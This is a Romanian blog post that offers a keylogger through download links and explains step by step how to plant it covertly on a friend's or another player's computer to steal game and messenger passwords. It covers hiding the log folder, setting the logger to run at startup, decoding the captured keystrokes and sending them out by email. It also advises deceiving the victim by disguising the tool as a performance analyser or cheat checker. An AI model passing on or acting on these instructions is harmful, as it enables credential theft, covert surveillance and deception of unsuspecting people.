marți, 16 aprilie 2013

[D]Keylogger


De multe ori te oftici ca un alt player are mai multi bani si un level mai mare decat tine.Atunci incerci sa-i spargi parola dar nu reusesti, sau vrei sa spargi o parola de mess, dar din nou nu reusesti.
Solutia este un KeyLogger, foarte usor.Ce face acest KeyLogger?Simplu, creaza un fisier .txt(notepad), cu tot ce scrie persoana respectiva.Este foarte simplu, il pune-ti in calculatorul prietenului/playerului, ve-ti face un folder unde va fi creat fisierul .txt, si copiati "codul tinta", iar dupa adaugati numele fisierului txt, urmat de extensia.txt.
Exemplu: Eu fac un folder in C->Windows, cu numele keylogger(bineinteles, daca faceti un folder cu acest nume persoana se va prinde), iar "codul tinta" este: "C:\Windows\keylogger", urmat de fisierul txt cu extensia, deci va arata asa: "C:\Windows\keylogger\tastatura.txt"(bineinteles, fara ghilimele), unde "tastatura.txt"este fisierul notepad cu tastatura.
Copiati "codul tinta"/il scrieti undeva intr-un fisier, apoi copy(ca totul sa fie foarte rapid, iar persoana sa nu-si dea seama ca va fi pacalita), il deschideti, inserati "codul tinta"si apasati hide, va aparea ce trebuie sa apasati ca sa apara din nou, dati repede "OK"(Daca nu sunteti siguri ca persoana se va reloga/loga in acea zi puteti bifa "run when computer is switchet".
Apoi dupa ce sunteti siguri ca persoana sa relogat/logat puteti merge la fisierul creat, il deschideti, arata-tii persoanei ca nu are de ce sa fie dubioasa(Din fisier nu se va intelege nimic), apoi inchideti-l, faceti sa reapara programul, apasati "decode"si inchideti programul.
Acum in folderul cu fisierul txt va mai fi creat automat unul cu numele pus de dumneavoastra_decoded.txt, acesa-l puteti lua si pune pe un stick/trimitandu-l pe mail sau, ca persoana sa nu intre la idei, face-ti o arhiva si trimiteti arhiva, apoi puteti sterge folderul, programul si arhiva.
Depinde de creativitatea voastra pentru a pacali persoana, ori spunand ca este un analizator pentru performantele pc-ului, ori un verificator de conturi, si doriti sa vedeti daca persoana a folosit cheat-uri, puteti schimba iconul, numele butoanelor, etc cum vreti voi cu un program numit "ResHacker".
Download-Zippyshare
Download-Girlshare
Share:

0 comentarii:

Traduce pagina

Total vizite postari

Nume

E-mail *

Mesaj *

Blog Archive

Un produs Blogger.